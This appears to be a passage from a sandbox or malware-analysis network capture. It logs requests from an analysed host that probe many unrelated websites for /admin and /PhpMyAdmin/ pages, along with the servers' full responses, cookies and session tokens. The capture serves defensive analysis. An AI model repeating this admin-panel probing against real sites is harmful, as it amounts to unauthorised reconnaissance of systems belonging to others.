                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_aid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_haid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_tmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                set-cookie: zm_htmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnly
2024-02-05 11:16:12 UTC | 1302 | IN
Data Ascii: set-cookie: _zm_ssid=aw1_c_46_GlhJUSrWrvY1B-ew1-g; Domain=zoom.us; Path=/; Secure; HttpOnly
set-cookie: cred=092EA1DAC5068B4D3FBA08CEAF50C7E4; Path=/; Secure; HttpOnly
set-cookie: _zm_ctaid=CznjiQGNRPyVSSbAlALjzQ.1707131772155.f8fd34c4e36040503732a9d7a6
2024-02-05 11:16:12 UTC | 627 | IN
Data Ascii: set-cookie: _zm_visitor_guid=68902877d77842d39e81677e408f9d8c; Max-Age=31536000; Expires=Tue, 04 Feb 2025 11:16:12 GMT; Domain=zoom.us; Path=/; Secure
x-zm-zoneid: VA2
content-language: en-US
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"h
2024-02-05 11:16:12 UTC | 1369 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 6d1d<!doctype html><html xmlns:fb="http://ogp.me/ns/fb#" lang="en-US"><head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# zoomvideocall: http://ogp.me/ns/fb/zoomvideocall#"><title>Page Not Found - Zoom</title><meta http-equiv="X-UA-Compati
2024-02-05 11:16:12 UTC | 1369 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: , video conference, online meetings, web meeting, video meeting, cloud meeting, cloud video, group video call, group video chat, screen share, application share, mobility, mobile collaboration, desktop share, video collaboration, group messaging" /><meta
2024-02-05 11:16:12 UTC | 1369 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tion used around the world in board, conference, huddle, and training rooms, as well as executive offices and classrooms. Founded in 2011, Zoom helps businesses and organizations bring their teams together in a frictionless environment to get more done. Z
2024-02-05 11:16:12 UTC | 1369 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: st_cookie.min.js" type="text/plain" class="optanon-category-C0004"></script><script nonce="qxWD7W5jToKGTvJe1Q9q2w">window.zmGlobalMrktId = "68902877d77842d39e81677e408f9d8c" || null;window.zmGlobalMrktKey = "" || null;window['optimizely'] = window['op
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 69 63 6f 6e 2d 65 72 72 6f 72 20 7b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 37 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 45 38 31 37 33 44 3b 0a 7d 0a 2e 65 78 70 69 72 65 64 2d 63 63 2d 62 61 6e 6e 65 72 20 2e 7a 6d 2d 69 63 6f 6e 2d 63 6c 6f 73 65 20 7b 0a 63 6f 6c 6f 72 3a 20 23 31 33 31 36 31 39 3b 0a 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 71 78 57 44 37 57 35 6a 54 6f 4b 47 54 76 4a 65 31 51 39 71 32 77 22 20 73 72 63 3d 22 2f 63 73 72 66 5f 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 71 78 57 44 37 57 35 6a 54 6f 4b 47 54 76 4a 65 31 51 39 71 32 77 22 3e 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: icon-error {font-size: 17px;color: #E8173D;}.expired-cc-banner .zm-icon-close {color: #131619;cursor: pointer;}</style><script nonce="qxWD7W5jToKGTvJe1Q9q2w" src="/csrf_js"></script><script nonce="qxWD7W5jToKGTvJe1Q9q2w">window.dataLayer = wind
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 72 65 66 27 29 3b 0a 69 66 28 63 6f 6f 6b 69 65 50 72 65 66 44 4f 4d 29 20 7b 0a 63 6f 6f 6b 69 65 50 72 65 66 44 4f 4d 2e 74 65 78 74 20 3d 20 24 2e 69 31 38 6e 2e 67 65 74 28 22 6d 61 72 6b 65 74 69 6e 67 2e 70 72 69 76 61 63 79 2e 6f 6e 65 74 72 75 73 74 2e 63 6f 6f 6b 69 65 5f 70 72 65 66 22 29 3b 0a 7d 0a 76 61 72 20 6f 6e 65 54 72 75 73 74 43 6f 6e 73 65 6e 74 49 64 20 3d 20 4f 6e 65 54 72 75 73 74 2e 67 65 74 44 61 74 61 53 75 62 6a 65 63 74 49 64 28 29 3b 0a 76 61 72 20 61 63 74 69 76 65 47 72 6f 75 70 73 20 3d 20 28 4f 6e 65 74 72 75 73 74 41 63 74 69 76 65 47 72 6f 75 70 73 20 7c 7c 20 27 27 29 2e 73 70 6c 69 74 28 27 2c 27 29 3b 0a 61 63 74 69 76 65 47 72 6f 75 70 73 20 3d 20 61 63 74 69 76 65 47 72 6f 75 70 73 2e 66 69 6c 74 65 72 28 66 75 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ref');if(cookiePrefDOM) {cookiePrefDOM.text = $.i18n.get("marketing.privacy.onetrust.cookie_pref");}var oneTrustConsentId = OneTrust.getDataSubjectId();var activeGroups = (OnetrustActiveGroups || '').split(',');activeGroups = activeGroups.filter(fun
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 6f 72 64 65 72 2d 6c 65 66 74 3a 20 31 70 78 20 73 6f 6c 69 64 3b 0a 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0a 7d 0a 23 6f 74 2d 64 6f 2d 6e 6f 74 2d 73 65 6c 6c 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 32 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 23 6f 74 2d 64 6f 2d 6e 6f 74 2d 73 65 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0a 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 6c 65 66 74 3a 20 36 70 78 3b 0a 74 6f 70 3a 20 35 30 25 3b 0a 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 30 25 29 3b 0a 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 68 65 69 67 68 74 3a 20 31 35 70 78 3b 0a 62 61 63 6b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: order-left: 1px solid;margin-left: 10px;}#ot-do-not-sell {position: relative;padding-left: 42px !important;}#ot-do-not-sell::before {content: "";position: absolute;left: 6px;top: 50%;transform: translateY(-50%);width: 30px;height: 15px;back
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC1369INData Raw: 74 72 6f 6c 73 3d 22 73 65 61 72 63 68 42 6f 78 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 42 75 74 74 6f 6e 49 63 6f 6e 22 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 65 6e 61 62 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 3d 22 6e 65 77 20 30 20 30 20 32 30 20 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 20 72 6f 6c 65 3d 22 69 6d 67 22 3e 0a 3c 67 20 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 3e 0a 3c 70 61 74 68 20 64 3d 22 6d 38 2e 33 36 38 20 31 36 2e 37 33 36 63 2d 34 2e 36 31 34 20 30 2d 38 2e 33 36 38 2d 33 2e 37 35 34
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: trols="searchBox" tabindex="0"><span class="searchButtonIcon"><svg xmlns="http://www.w3.org/2000/svg" focusable="false" enable-background="new 0 0 20 20" viewBox="0 0 20 20" role="img"><g fill="currentColor"><path d="m8.368 16.736c-4.614 0-8.368-3.754


Session ID  Source IP    Source Port  Destination IP  Destination Port
211         192.168.2.6  65376        34.149.46.130   443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:12 UTC  176                OUT        GET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC  5706               IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                set-cookie: sc-wcid=7fd9eb6d-6623-499c-b4bd-3c72bad8503b; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:16:12 GMT; Max-Age=86400; Secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: allow-from https://iframe.arkoselabs.com
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com 
https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com 
https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-cloud-trace-context: dd18e57cdfec9e77822963d37165491f
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                server: API Gateway
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 664
                                                                                                                                                                                                                                                                                                                                                                via: 1.1 google, 1.1 google
                                                                                                                                                                                                                                                                                                                                                                alt-svc: clear
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
2024-02-05 11:16:12 UTC  664                IN         Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-itunes-app" content="app-id=447188370"><title>404 &b


Session ID  Source IP    Source Port  Destination IP  Destination Port
212         192.168.2.6  65420        44.195.133.145  443

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:16:12 UTC  334                OUT        GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74472C5F492A4B3BEA18CC7421A779A020EA298EECDFAB0EDA1FF6AD3E90D0B14C56C348EF11DCF1C015A556B18100061CD
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC  1165               IN         HTTP/1.1 200
                                                                                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-ES
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Expires: Sun, 05 Feb 2023 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 05 Feb 2004 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                P3P: CP="CAO PSA OUR"
                                                                                                                                                                                                                                                                                                                                                                Pragma: private
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=0DC6C8E114AB6AC5B1622F32932865EE; Path=/; Secure
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BbRouter=expires:1707142572,id:70BDD3982D15BD39D9F429E61AB6F0E7,signature:bb545f6432edb4c6c395d991d45125b57b93f044e3dbb5fa79bbf62b9605e5cf,site:6c65ed46-3830-485d-a4b2-aea1e7764ad4,v:2,xsrf:33fe813f-9782-4f57-ab1f-270109e68435; Path=/; Secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-appserver: ip-10-146-210-170.ec2.internal
                                                                                                                                                                                                                                                                                                                                                                X-Blackboard-product: Blackboard Learn &#8482; 3900.84.0-rel.31+aedff82
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: Close


Session ID | Source IP | Source Port | Destination IP | Destination Port
213 | 192.168.2.6 | 65421 | 138.197.59.199 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 184 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC | 585 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: JSP/2.2
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=W9m9qKz7BTe7YTE1DP9qHQ2-.cmrsanmartin; path=/
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex,noarchive
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000 ; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-CL
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:12 UTC554INData Raw: 32 31 65 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 3e 3c 2f 6c 69 6e 6b 3e 0d 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 2d 20 4c 61 20 70 c3 a1 67 69 6e 61 20 6e 6f 20 65 78 69 73 74 65 3c 2f 74 69 74 6c 65 3e 09 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 21e<!DOCTYPE html><html lang="es" class="login"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="shortcut icon" href="/favicon.ico" ></link><title>Error - La pgina no existe</title><link type="te


Session ID | Source IP | Source Port | Destination IP | Destination Port
214 | 192.168.2.6 | 65478 | 47.251.24.188 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 315 | OUT | GET /404 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cjdropshipping.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: INGRESSCOOKIE=1707131772.255.15159.541229|f85a63221c8fd9b049d9a82e34821ae3; csrfToken=gyl8dbRELIEkZ6gzYC5izLX9; language=en|en; lng=en
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:13 UTC362INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 52784
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-download-options: noopen
                                                                                                                                                                                                                                                                                                                                                                x-readtime: 13
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=15724800; includeSubDomains
2024-02-05 11:16:13 UTC | 3734 | IN | Data Ascii: <!DOCTYPE html><html lang="en" xmlns=""><head> <meta charset="UTF-8"> <meta name="renderer" content="webkit|ie-comp|ie-stand"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width,
2024-02-05 11:16:13 UTC | 37 | IN | Data Ascii: 9-57/static/css/home-common.css">
2024-02-05 11:16:13 UTC | 4096 | IN | Data Ascii: ...loading--> <link rel="stylesheet" href="https://frontend.cjdropshipping.com/common-public/loading/loading.css"> ...--> <link rel="stylesheet" type="text/css" href="https://frontend.cjdropshipping.com/cj-web-egg/2024-01-31-04-
2024-02-05 11:16:13 UTC | 4096 | IN | Data Ascii: "Vietnamese\",\"common-top-confirm\":\"Confirm\",\"copyright-cjdropshipping.com-all-rights-reserved\":\"CJdropshipping.com All Rights Reserved\",\"language-croatian\":\"Croatian\",\"footer-payment-methods\":\"Payment Methods\",\"language-german\":\"German
2024-02-05 11:16:13 UTC | 4096 | IN | Data Ascii: -aliexpress\":\"Go to AliExpress\",\"language-welsh\":\"Welsh\",\"language-serbian\":\"Serbian\",\"footer-features\":\"Features\",\"language-portuguese\":\"Portuguese\",\"top-nav-sourcing\":\"Sourcing\",\"common-top-source-more\":\"Source More\",\"languag
2024-02-05 11:16:13 UTC | 4096 | IN | Data Ascii: st products to your store automatically.\",\"intelGuid-source-products-to-cj-from-1688-taobao-aliexpress.\":\"Source products to CJ from 1688, Taobao, Aliexpress.\",\"intelGuid-worldwide-warehouses\":\"Worldwide Warehouses\",\"intelGuid-jinhua-warehouse\"
2024-02-05 11:16:13 UTC | 2219 | IN | Data Ascii: bile APP Processing\",\"intelGuid-cj-platform\":\"CJ Platform\",\"intelGuid-manage-all-your-stores-after-authorization.\":\"Manage all your stores after authorization.\",\"intelGuid-print-on-demand\":\"Print on Demand\",\"intelGuid-product-connection\":\"
2024-02-05 11:16:13 UTC | 4096 | IN | Data Ascii: \":\"Inventory Alert\",\"home-cj-super-deals\":\"CJ Super Deals\",\"home-pending-payment\":\"Pending Payment\",\"home-dispatched\":\"Dispatched\",\"home-pending\":\"Pending\",\"home-closed\":\"Closed\",\"home-processing\":\"Processing\",\"home-awaiting-pa
2024-02-05 11:16:13 UTC | 4096 | IN | Data Ascii: -header-wallet\":\"Wallet\",\"warehouse-header-tool\":\"Tool\",\"trans-German\":\"German\",\"warehouse-header-account\":\"Account\",\"lan-confirm\":\"Confirm\",\"mobile-filter-discount\":\"Special Services & Discount\",\"CJRecommondation.title\":\"Product
2024-02-05 11:16:13 UTC | 4096 | IN | Data Ascii: ntelGuid-decide-how-to-set-the-tracking-number-synced-to-your-specific-store.\":\"Decide how to set the tracking number synced to your specific store.\",\"intelGuid-ship-a-bulk-of-items-to-your-place.\":\"Ship a bulk of items to your place.\",\"intelGuid-


Session ID | Source IP | Source Port | Destination IP | Destination Port
215 | 192.168.2.6 | 65454 | 142.250.105.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:12 UTC | 180 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:12 UTC | 842 | IN | HTTP/1.1 404 Not Found
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:12 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-02-05 11:16:12 UTC | 1252 | IN | Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ri3vpq6fY5ljtz7SM7TL7w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2024-02-05 11:16:12 UTC | 397 | IN | Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
2024-02-05 11:16:12 UTC | 5 | IN | Data Ascii: 0


